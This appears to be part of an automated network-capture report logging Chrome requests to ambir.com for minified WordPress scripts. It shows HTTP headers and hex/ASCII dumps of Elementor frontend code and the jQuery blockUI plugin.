                                                                                                                                                                                              2024-11-20 20:28:22 UTC1369INData Raw: 7b 63 6f 6e 73 74 20 6e 3d 74 68 69 73 2e 67 65 74 44 69 72 65 63 74 69 6f 6e 4d 6f 76 65 50 6f 69 6e 74 28 74 2c 65 2e 64 69 72 65 63 74 69 6f 6e 2c 65 2e 72 61 6e 67 65 29 2c 73 3d 65 2e 6c 65 76 65 6c 2d 74 68 69 73 2e 67 65 74 45 66 66 65 63 74 56 61 6c 75 65 46 72 6f 6d 4d 6f 76 65 50 6f 69 6e 74 28 65 2e 6c 65 76 65 6c 2c 6e 29 3b 74 68 69 73 2e 75 70 64 61 74 65 52 75 6c 65 50 61 72 74 28 22 66 69 6c 74 65 72 22 2c 22 62 6c 75 72 22 2c 73 2b 22 70 78 22 29 7d 75 70 64 61 74 65 52 75 6c 65 50 61 72 74 28 65 2c 74 2c 6e 29 7b 74 68 69 73 2e 72 75 6c 65 73 56 61 72 69 61 62 6c 65 73 5b 65 5d 7c 7c 28 74 68 69 73 2e 72 75 6c 65 73 56 61 72 69 61 62 6c 65 73 5b 65 5d 3d 7b 7d 29 2c 74 68 69 73 2e 72 75 6c 65 73 56 61 72 69 61 62 6c 65 73 5b 65 5d 5b 74
                                                                                                                                                                                              Data Ascii: {const n=this.getDirectionMovePoint(t,e.direction,e.range),s=e.level-this.getEffectValueFromMovePoint(e.level,n);this.updateRulePart("filter","blur",s+"px")}updateRulePart(e,t,n){this.rulesVariables[e]||(this.rulesVariables[e]={}),this.rulesVariables[e][t


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              45192.168.2.549773141.193.213.104431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:22 UTC602OUTGET /wp-content/cache/wpo-minify/1732127092/assets/wpo-minify-footer-9eda13b5.min.js HTTP/1.1
                                                                                                                                                                                              Host: ambir.com
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                              Referer: https://ambir.com/ambir-card-scanners/
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              2024-11-20 20:28:22 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:22 GMT
                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Last-Modified: Wed, 20 Nov 2024 18:27:07 GMT
                                                                                                                                                                                              ETag: W/"673e29fb-168be"
                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                              Age: 6833
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 8e5b2fa1dc6f4373-EWR
                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                              2024-11-20 20:28:22 UTC878INData Raw: 37 64 63 35 0d 0a 0a 76 61 72 20 65 6c 65 6d 65 6e 74 6f 72 46 72 6f 6e 74 65 6e 64 43 6f 6e 66 69 67 20 3d 20 7b 22 65 6e 76 69 72 6f 6e 6d 65 6e 74 4d 6f 64 65 22 3a 7b 22 65 64 69 74 22 3a 66 61 6c 73 65 2c 22 77 70 50 72 65 76 69 65 77 22 3a 66 61 6c 73 65 2c 22 69 73 53 63 72 69 70 74 44 65 62 75 67 22 3a 66 61 6c 73 65 7d 2c 22 69 31 38 6e 22 3a 7b 22 73 68 61 72 65 4f 6e 46 61 63 65 62 6f 6f 6b 22 3a 22 53 68 61 72 65 20 6f 6e 20 46 61 63 65 62 6f 6f 6b 22 2c 22 73 68 61 72 65 4f 6e 54 77 69 74 74 65 72 22 3a 22 53 68 61 72 65 20 6f 6e 20 54 77 69 74 74 65 72 22 2c 22 70 69 6e 49 74 22 3a 22 50 69 6e 20 69 74 22 2c 22 64 6f 77 6e 6c 6f 61 64 22 3a 22 44 6f 77 6e 6c 6f 61 64 22 2c 22 64 6f 77 6e 6c 6f 61 64 49 6d 61 67 65 22 3a 22 44 6f 77 6e 6c 6f
                                                                                                                                                                                              Data Ascii: 7dc5var elementorFrontendConfig = {"environmentMode":{"edit":false,"wpPreview":false,"isScriptDebug":false},"i18n":{"shareOnFacebook":"Share on Facebook","shareOnTwitter":"Share on Twitter","pinIt":"Pin it","download":"Download","downloadImage":"Downlo
                                                                                                                                                                                              2024-11-20 20:28:22 UTC1369INData Raw: 6f 62 69 6c 65 20 50 6f 72 74 72 61 69 74 22 2c 22 76 61 6c 75 65 22 3a 37 36 37 2c 22 64 65 66 61 75 6c 74 5f 76 61 6c 75 65 22 3a 37 36 37 2c 22 64 69 72 65 63 74 69 6f 6e 22 3a 22 6d 61 78 22 2c 22 69 73 5f 65 6e 61 62 6c 65 64 22 3a 74 72 75 65 7d 2c 22 6d 6f 62 69 6c 65 5f 65 78 74 72 61 22 3a 7b 22 6c 61 62 65 6c 22 3a 22 4d 6f 62 69 6c 65 20 4c 61 6e 64 73 63 61 70 65 22 2c 22 76 61 6c 75 65 22 3a 38 38 30 2c 22 64 65 66 61 75 6c 74 5f 76 61 6c 75 65 22 3a 38 38 30 2c 22 64 69 72 65 63 74 69 6f 6e 22 3a 22 6d 61 78 22 2c 22 69 73 5f 65 6e 61 62 6c 65 64 22 3a 66 61 6c 73 65 7d 2c 22 74 61 62 6c 65 74 22 3a 7b 22 6c 61 62 65 6c 22 3a 22 54 61 62 6c 65 74 20 50 6f 72 74 72 61 69 74 22 2c 22 76 61 6c 75 65 22 3a 31 30 32 34 2c 22 64 65 66 61 75 6c 74
                                                                                                                                                                                              Data Ascii: obile Portrait","value":767,"default_value":767,"direction":"max","is_enabled":true},"mobile_extra":{"label":"Mobile Landscape","value":880,"default_value":880,"direction":"max","is_enabled":false},"tablet":{"label":"Tablet Portrait","value":1024,"default
                                                                                                                                                                                              2024-11-20 20:28:22 UTC1369INData Raw: 63 74 69 76 65 5f 62 72 65 61 6b 70 6f 69 6e 74 73 22 3a 5b 22 76 69 65 77 70 6f 72 74 5f 6d 6f 62 69 6c 65 22 2c 22 76 69 65 77 70 6f 72 74 5f 74 61 62 6c 65 74 22 5d 2c 22 67 6c 6f 62 61 6c 5f 69 6d 61 67 65 5f 6c 69 67 68 74 62 6f 78 22 3a 22 79 65 73 22 2c 22 6c 69 67 68 74 62 6f 78 5f 65 6e 61 62 6c 65 5f 63 6f 75 6e 74 65 72 22 3a 22 79 65 73 22 2c 22 6c 69 67 68 74 62 6f 78 5f 65 6e 61 62 6c 65 5f 66 75 6c 6c 73 63 72 65 65 6e 22 3a 22 79 65 73 22 2c 22 6c 69 67 68 74 62 6f 78 5f 65 6e 61 62 6c 65 5f 7a 6f 6f 6d 22 3a 22 79 65 73 22 2c 22 6c 69 67 68 74 62 6f 78 5f 65 6e 61 62 6c 65 5f 73 68 61 72 65 22 3a 22 79 65 73 22 2c 22 6c 69 67 68 74 62 6f 78 5f 74 69 74 6c 65 5f 73 72 63 22 3a 22 74 69 74 6c 65 22 2c 22 6c 69 67 68 74 62 6f 78 5f 64 65 73
                                                                                                                                                                                              Data Ascii: ctive_breakpoints":["viewport_mobile","viewport_tablet"],"global_image_lightbox":"yes","lightbox_enable_counter":"yes","lightbox_enable_fullscreen":"yes","lightbox_enable_zoom":"yes","lightbox_enable_share":"yes","lightbox_title_src":"title","lightbox_des
                                                                                                                                                                                              2024-11-20 20:28:22 UTC1369INData Raw: 6c 61 73 73 65 73 5b 73 5d 7c 7c 74 68 69 73 2e 64 6f 63 75 6d 65 6e 74 43 6c 61 73 73 65 73 2e 62 61 73 65 3b 74 68 69 73 2e 64 6f 63 75 6d 65 6e 74 73 5b 6e 5d 3d 6e 65 77 20 6f 28 7b 24 65 6c 65 6d 65 6e 74 3a 65 2c 69 64 3a 6e 7d 29 7d 7d 74 2e 64 65 66 61 75 6c 74 3d 5f 64 65 66 61 75 6c 74 7d 2c 39 38 30 34 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 76 61 72 20 73 3d 6e 28 33 32 30 33 29 2c 6f 3d 73 28 6e 28 36 33 39 37 29 29 2c 69 3d 73 28 6e 28 38 37 30 34 29 29 2c 72 3d 73 28 6e 28 34 39 38 35 29 29 2c 6c 3d 73 28 6e 28 37 35 33 37 29 29 2c 61 3d 73 28 6e 28 33 35 35 29 29 2c 64 3d 73 28 6e 28 32 38 30 34 29 29 2c 63 3d 73 28 6e 28 33 33 38 34 29 29 3b 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 74 68 69 73 3b 63 6f
                                                                                                                                                                                              Data Ascii: lasses[s]||this.documentClasses.base;this.documents[n]=new o({$element:e,id:n})}}t.default=_default},9804:(e,t,n)=>{var s=n(3203),o=s(n(6397)),i=s(n(8704)),r=s(n(4985)),l=s(n(7537)),a=s(n(355)),d=s(n(2804)),c=s(n(3384));e.exports=function(e){var t=this;co
                                                                                                                                                                                              2024-11-20 20:28:22 UTC1369INData Raw: 74 73 48 61 6e 64 6c 65 72 73 3d 28 29 3d 3e 7b 74 68 69 73 2e 65 6c 65 6d 65 6e 74 73 48 61 6e 64 6c 65 72 73 2e 73 65 63 74 69 6f 6e 3d 5b 64 2e 64 65 66 61 75 6c 74 2c 2e 2e 2e 69 2e 64 65 66 61 75 6c 74 2c 61 2e 64 65 66 61 75 6c 74 2c 63 2e 64 65 66 61 75 6c 74 5d 2c 74 68 69 73 2e 65 6c 65 6d 65 6e 74 73 48 61 6e 64 6c 65 72 73 2e 63 6f 6e 74 61 69 6e 65 72 3d 5b 2e 2e 2e 69 2e 64 65 66 61 75 6c 74 5d 2c 65 6c 65 6d 65 6e 74 6f 72 46 72 6f 6e 74 65 6e 64 2e 69 73 45 64 69 74 4d 6f 64 65 28 29 26 26 74 68 69 73 2e 65 6c 65 6d 65 6e 74 73 48 61 6e 64 6c 65 72 73 2e 63 6f 6e 74 61 69 6e 65 72 2e 70 75 73 68 28 2e 2e 2e 72 2e 64 65 66 61 75 6c 74 29 2c 74 68 69 73 2e 65 6c 65 6d 65 6e 74 73 48 61 6e 64 6c 65 72 73 2e 63 6f 6c 75 6d 6e 3d 6c 2e 64 65 66
                                                                                                                                                                                              Data Ascii: tsHandlers=()=>{this.elementsHandlers.section=[d.default,...i.default,a.default,c.default],this.elementsHandlers.container=[...i.default],elementorFrontend.isEditMode()&&this.elementsHandlers.container.push(...r.default),this.elementsHandlers.column=l.def
                                                                                                                                                                                              2024-11-20 20:28:22 UTC1369INData Raw: 74 68 69 73 2e 67 65 74 48 61 6e 64 6c 65 72 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 6c 65 6d 65 6e 74 6f 72 44 65 76 54 6f 6f 6c 73 2e 64 65 70 72 65 63 61 74 69 6f 6e 2e 64 65 70 72 65 63 61 74 65 64 28 22 67 65 74 48 61 6e 64 6c 65 72 73 22 2c 22 33 2e 31 2e 30 22 2c 22 65 6c 65 6d 65 6e 74 6f 72 46 72 6f 6e 74 65 6e 64 2e 65 6c 65 6d 65 6e 74 73 48 61 6e 64 6c 65 72 2e 67 65 74 48 61 6e 64 6c 65 72 22 29 2c 65 3f 74 68 69 73 2e 67 65 74 48 61 6e 64 6c 65 72 28 65 29 3a 74 68 69 73 2e 65 6c 65 6d 65 6e 74 73 48 61 6e 64 6c 65 72 73 7d 2c 74 68 69 73 2e 72 75 6e 52 65 61 64 79 54 72 69 67 67 65 72 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 63 6f 6e 73 74 20 6e 3d 21 21 74 2e 63 6c 6f 73 65 73 74 28 27 5b 64 61 74 61 2d 64 65 6c 61
                                                                                                                                                                                              Data Ascii: this.getHandlers=function(e){return elementorDevTools.deprecation.deprecated("getHandlers","3.1.0","elementorFrontend.elementsHandler.getHandler"),e?this.getHandler(e):this.elementsHandlers},this.runReadyTrigger=function(t){const n=!!t.closest('[data-dela
                                                                                                                                                                                              2024-11-20 20:28:22 UTC1369INData Raw: 72 6f 6e 74 65 6e 64 2e 63 6f 6e 66 69 67 2e 6c 65 67 61 63 79 4d 6f 64 65 2e 65 6c 65 6d 65 6e 74 57 72 61 70 70 65 72 73 22 2c 22 33 2e 31 2e 30 22 29 2c 21 31 7d 7d 2c 74 68 69 73 2e 70 6f 70 75 6c 61 74 65 41 63 74 69 76 65 42 72 65 61 6b 70 6f 69 6e 74 73 43 6f 6e 66 69 67 28 29 7d 67 65 74 20 4d 6f 64 75 6c 65 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 69 73 45 64 69 74 4d 6f 64 65 28 29 26 26 70 61 72 65 6e 74 2e 65 6c 65 6d 65 6e 74 6f 72 44 65 76 54 6f 6f 6c 73 2e 64 65 70 72 65 63 61 74 69 6f 6e 2e 64 65 70 72 65 63 61 74 65 64 28 22 65 6c 65 6d 65 6e 74 6f 72 46 72 6f 6e 74 65 6e 64 2e 4d 6f 64 75 6c 65 22 2c 22 32 2e 35 2e 30 22 2c 22 65 6c 65 6d 65 6e 74 6f 72 4d 6f 64 75 6c 65 73 2e 66 72 6f 6e 74 65 6e 64 2e 68 61 6e 64 6c 65 72 73 2e 42
                                                                                                                                                                                              Data Ascii: rontend.config.legacyMode.elementWrappers","3.1.0"),!1}},this.populateActiveBreakpointsConfig()}get Module(){return this.isEditMode()&&parent.elementorDevTools.deprecation.deprecated("elementorFrontend.Module","2.5.0","elementorModules.frontend.handlers.B
                                                                                                                                                                                              2024-11-20 20:28:22 UTC1369INData Raw: 74 68 69 73 2e 67 65 74 57 69 64 65 73 63 72 65 65 6e 53 65 74 74 69 6e 67 28 74 2c 6e 29 3b 63 6f 6e 73 74 20 73 3d 65 6c 65 6d 65 6e 74 6f 72 46 72 6f 6e 74 65 6e 64 2e 62 72 65 61 6b 70 6f 69 6e 74 73 2e 67 65 74 41 63 74 69 76 65 42 72 65 61 6b 70 6f 69 6e 74 73 4c 69 73 74 28 7b 6c 61 72 67 65 54 6f 53 6d 61 6c 6c 3a 21 30 2c 77 69 74 68 44 65 73 6b 74 6f 70 3a 21 30 7d 29 3b 6c 65 74 20 6f 3d 73 2e 69 6e 64 65 78 4f 66 28 65 29 3b 66 6f 72 28 3b 6f 3e 30 3b 29 7b 63 6f 6e 73 74 20 65 3d 74 5b 6e 2b 22 5f 22 2b 73 5b 6f 5d 5d 3b 69 66 28 65 7c 7c 30 3d 3d 3d 65 29 72 65 74 75 72 6e 20 65 3b 6f 2d 2d 7d 72 65 74 75 72 6e 20 74 5b 6e 5d 7d 67 65 74 57 69 64 65 73 63 72 65 65 6e 53 65 74 74 69 6e 67 28 65 2c 74 29 7b 63 6f 6e 73 74 20 6e 3d 74 2b 22 5f
                                                                                                                                                                                              Data Ascii: this.getWidescreenSetting(t,n);const s=elementorFrontend.breakpoints.getActiveBreakpointsList({largeToSmall:!0,withDesktop:!0});let o=s.indexOf(e);for(;o>0;){const e=t[n+"_"+s[o]];if(e||0===e)return e;o--}return t[n]}getWidescreenSetting(e,t){const n=t+"_
                                                                                                                                                                                              2024-11-20 20:28:22 UTC1369INData Raw: 66 69 6e 64 28 74 68 69 73 2e 67 65 74 53 65 74 74 69 6e 67 73 28 22 73 65 6c 65 63 74 6f 72 73 2e 61 64 6d 69 6e 42 61 72 22 29 29 7d 61 64 64 55 73 65 72 41 67 65 6e 74 43 6c 61 73 73 65 73 28 29 7b 66 6f 72 28 63 6f 6e 73 74 5b 65 2c 74 5d 6f 66 20 4f 62 6a 65 63 74 2e 65 6e 74 72 69 65 73 28 72 2e 64 65 66 61 75 6c 74 29 29 74 26 26 74 68 69 73 2e 65 6c 65 6d 65 6e 74 73 2e 24 62 6f 64 79 2e 61 64 64 43 6c 61 73 73 28 22 65 2d 2d 75 61 2d 22 2b 65 29 7d 73 65 74 44 65 76 69 63 65 4d 6f 64 65 44 61 74 61 28 29 7b 74 68 69 73 2e 65 6c 65 6d 65 6e 74 73 2e 24 62 6f 64 79 2e 61 74 74 72 28 22 64 61 74 61 2d 65 6c 65 6d 65 6e 74 6f 72 2d 64 65 76 69 63 65 2d 6d 6f 64 65 22 2c 74 68 69 73 2e 67 65 74 43 75 72 72 65 6e 74 44 65 76 69 63 65 4d 6f 64 65 28 29
                                                                                                                                                                                              Data Ascii: find(this.getSettings("selectors.adminBar"))}addUserAgentClasses(){for(const[e,t]of Object.entries(r.default))t&&this.elements.$body.addClass("e--ua-"+e)}setDeviceModeData(){this.elements.$body.attr("data-elementor-device-mode",this.getCurrentDeviceMode()
                                                                                                                                                                                              2024-11-20 20:28:22 UTC1369INData Raw: 2c 74 68 69 73 2e 6d 6f 64 75 6c 65 73 48 61 6e 64 6c 65 72 73 3d 7b 7d 2c 74 68 69 73 2e 61 64 64 55 73 65 72 41 67 65 6e 74 43 6c 61 73 73 65 73 28 29 2c 74 68 69 73 2e 73 65 74 44 65 76 69 63 65 4d 6f 64 65 44 61 74 61 28 29 2c 74 68 69 73 2e 69 6e 69 74 44 69 61 6c 6f 67 73 4d 61 6e 61 67 65 72 28 29 2c 74 68 69 73 2e 69 73 45 64 69 74 4d 6f 64 65 28 29 26 26 74 68 69 73 2e 6d 75 74 65 4d 69 67 72 61 74 69 6f 6e 54 72 61 63 65 73 28 29 2c 70 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 74 68 69 73 2e 65 6c 65 6d 65 6e 74 73 2e 24 77 69 6e 64 6f 77 2c 22 65 6c 65 6d 65 6e 74 6f 72 2f 66 72 6f 6e 74 65 6e 64 2f 69 6e 69 74 22 29 2c 74 68 69 73 2e 69 6e 69 74 4d 6f 64 75 6c 65 73 28 29 2c 74 68 69 73 2e 69 6e 69 74 4f 6e 52 65 61 64 79 45 6c 65
                                                                                                                                                                                              Data Ascii: ,this.modulesHandlers={},this.addUserAgentClasses(),this.setDeviceModeData(),this.initDialogsManager(),this.isEditMode()&&this.muteMigrationTraces(),p.default.dispatch(this.elements.$window,"elementor/frontend/init"),this.initModules(),this.initOnReadyEle


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              46192.168.2.549772141.193.213.104431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:22 UTC602OUTGET /wp-content/cache/wpo-minify/1732127092/assets/wpo-minify-header-aead31c6.min.js HTTP/1.1
                                                                                                                                                                                              Host: ambir.com
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                              Referer: https://ambir.com/ambir-card-scanners/
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              2024-11-20 20:28:22 UTC490INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:22 GMT
                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Last-Modified: Wed, 20 Nov 2024 18:27:07 GMT
                                                                                                                                                                                              ETag: W/"673e29fb-4873"
                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                              Age: 6832
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 8e5b2fa23f1219b2-EWR
                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                              2024-11-20 20:28:22 UTC879INData Raw: 34 38 37 33 0d 0a 0a 2f 2a 21 0a 20 2a 20 6a 51 75 65 72 79 20 62 6c 6f 63 6b 55 49 20 70 6c 75 67 69 6e 0a 20 2a 20 56 65 72 73 69 6f 6e 20 32 2e 37 30 2e 30 2d 32 30 31 34 2e 31 31 2e 32 33 0a 20 2a 20 52 65 71 75 69 72 65 73 20 6a 51 75 65 72 79 20 76 31 2e 37 20 6f 72 20 6c 61 74 65 72 0a 20 2a 0a 20 2a 20 45 78 61 6d 70 6c 65 73 20 61 74 3a 20 68 74 74 70 3a 2f 2f 6d 61 6c 73 75 70 2e 63 6f 6d 2f 6a 71 75 65 72 79 2f 62 6c 6f 63 6b 2f 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 30 37 2d 32 30 31 33 20 4d 2e 20 41 6c 73 75 70 0a 20 2a 20 44 75 61 6c 20 6c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 61 6e 64 20 47 50 4c 20 6c 69 63 65 6e 73 65 73 3a 0a 20 2a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 6f 70 65 6e 73 6f 75
                                                                                                                                                                                              Data Ascii: 4873/*! * jQuery blockUI plugin * Version 2.70.0-2014.11.23 * Requires jQuery v1.7 or later * * Examples at: http://malsup.com/jquery/block/ * Copyright (c) 2007-2013 M. Alsup * Dual licensed under the MIT and GPL licenses: * http://www.opensou
                                                                                                                                                                                              2024-11-20 20:28:22 UTC1369INData Raw: 22 3e 3c 2f 64 69 76 3e 27 29 3b 74 26 26 73 2e 61 70 70 65 6e 64 28 22 3c 68 31 3e 22 2b 74 2b 22 3c 2f 68 31 3e 22 29 2c 6f 26 26 73 2e 61 70 70 65 6e 64 28 22 3c 68 32 3e 22 2b 6f 2b 22 3c 2f 68 32 3e 22 29 2c 6e 3d 3d 3d 75 6e 64 65 66 69 6e 65 64 26 26 28 6e 3d 33 65 33 29 3b 76 61 72 20 6c 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 3d 74 7c 7c 7b 7d 2c 65 2e 62 6c 6f 63 6b 55 49 28 7b 6d 65 73 73 61 67 65 3a 73 2c 66 61 64 65 49 6e 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 66 61 64 65 49 6e 3f 74 2e 66 61 64 65 49 6e 3a 37 30 30 2c 66 61 64 65 4f 75 74 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 66 61 64 65 4f 75 74 3f 74 2e 66 61 64 65 4f 75 74 3a 31 65 33 2c 74 69 6d 65 6f 75 74 3a 22 75 6e 64 65
                                                                                                                                                                                              Data Ascii: "></div>');t&&s.append("<h1>"+t+"</h1>"),o&&s.append("<h2>"+o+"</h2>"),n===undefined&&(n=3e3);var l=function(t){t=t||{},e.blockUI({message:s,fadeIn:"undefined"!=typeof t.fadeIn?t.fadeIn:700,fadeOut:"undefined"!=typeof t.fadeOut?t.fadeOut:1e3,timeout:"unde
                                                                                                                                                                                              2024-11-20 20:28:22 UTC1369INData Raw: 6f 70 61 63 69 74 79 3a 2e 36 2c 63 75 72 73 6f 72 3a 22 77 61 69 74 22 7d 2c 63 75 72 73 6f 72 52 65 73 65 74 3a 22 64 65 66 61 75 6c 74 22 2c 67 72 6f 77 6c 43 53 53 3a 7b 77 69 64 74 68 3a 22 33 35 30 70 78 22 2c 74 6f 70 3a 22 31 30 70 78 22 2c 6c 65 66 74 3a 22 22 2c 72 69 67 68 74 3a 22 31 30 70 78 22 2c 62 6f 72 64 65 72 3a 22 6e 6f 6e 65 22 2c 70 61 64 64 69 6e 67 3a 22 35 70 78 22 2c 6f 70 61 63 69 74 79 3a 2e 36 2c 63 75 72 73 6f 72 3a 22 64 65 66 61 75 6c 74 22 2c 63 6f 6c 6f 72 3a 22 23 66 66 66 22 2c 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 3a 22 23 30 30 30 22 2c 22 2d 77 65 62 6b 69 74 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 22 3a 22 31 30 70 78 22 2c 22 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 22 3a 22 31 30 70 78 22 2c
                                                                                                                                                                                              Data Ascii: opacity:.6,cursor:"wait"},cursorReset:"default",growlCSS:{width:"350px",top:"10px",left:"",right:"10px",border:"none",padding:"5px",opacity:.6,cursor:"default",color:"#fff",backgroundColor:"#000","-webkit-border-radius":"10px","-moz-border-radius":"10px",
                                                                                                                                                                                              2024-11-20 20:28:22 UTC1369INData Raw: 6d 2e 70 61 72 65 6e 74 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 79 29 7d 65 28 64 29 2e 64 61 74 61 28 22 62 6c 6f 63 6b 55 49 2e 6f 6e 55 6e 62 6c 6f 63 6b 22 2c 63 2e 6f 6e 55 6e 62 6c 6f 63 6b 29 3b 76 61 72 20 67 2c 76 2c 49 2c 77 2c 55 3d 63 2e 62 61 73 65 5a 3b 67 3d 6f 7c 7c 63 2e 66 6f 72 63 65 49 66 72 61 6d 65 3f 65 28 27 3c 69 66 72 61 6d 65 20 63 6c 61 73 73 3d 22 62 6c 6f 63 6b 55 49 22 20 73 74 79 6c 65 3d 22 7a 2d 69 6e 64 65 78 3a 27 2b 55 2b 2b 2b 27 3b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 77 69 64 74 68 3a 31 30 30 25 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 74 6f 70 3a 30 3b 6c 65 66 74 3a 30
                                                                                                                                                                                              Data Ascii: m.parent.removeChild(y)}e(d).data("blockUI.onUnblock",c.onUnblock);var g,v,I,w,U=c.baseZ;g=o||c.forceIframe?e('<iframe class="blockUI" style="z-index:'+U+++';display:none;border:none;margin:0;padding:0;position:absolute;width:100%;height:100%;top:0;left:0
                                                                                                                                                                                              2024-11-20 20:28:22 UTC1369INData Raw: 79 6c 65 3d 22 7a 2d 69 6e 64 65 78 3a 27 2b 28 55 2b 31 30 29 2b 27 3b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 70 6f 73 69 74 69 6f 6e 3a 66 69 78 65 64 22 3e 3c 2f 64 69 76 3e 27 3a 27 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6c 6f 63 6b 55 49 20 27 2b 63 2e 62 6c 6f 63 6b 4d 73 67 43 6c 61 73 73 2b 27 20 62 6c 6f 63 6b 45 6c 65 6d 65 6e 74 22 20 73 74 79 6c 65 3d 22 7a 2d 69 6e 64 65 78 3a 27 2b 28 55 2b 31 30 29 2b 27 3b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 22 3e 3c 2f 64 69 76 3e 27 2c 49 3d 65 28 77 29 2c 6b 26 26 28 63 2e 74 68 65 6d 65 3f 28 49 2e 63 73 73 28 62 29 2c 49 2e 61 64 64 43 6c 61 73 73 28 22 75 69 2d 77 69 64 67 65 74 2d 63 6f 6e 74 65 6e 74 22 29 29 3a 49 2e 63 73 73 28 75 29 29 2c 63
                                                                                                                                                                                              Data Ascii: yle="z-index:'+(U+10)+';display:none;position:fixed"></div>':'<div class="blockUI '+c.blockMsgClass+' blockElement" style="z-index:'+(U+10)+';display:none;position:absolute"></div>',I=e(w),k&&(c.theme?(I.css(b),I.addClass("ui-widget-content")):I.css(u)),c
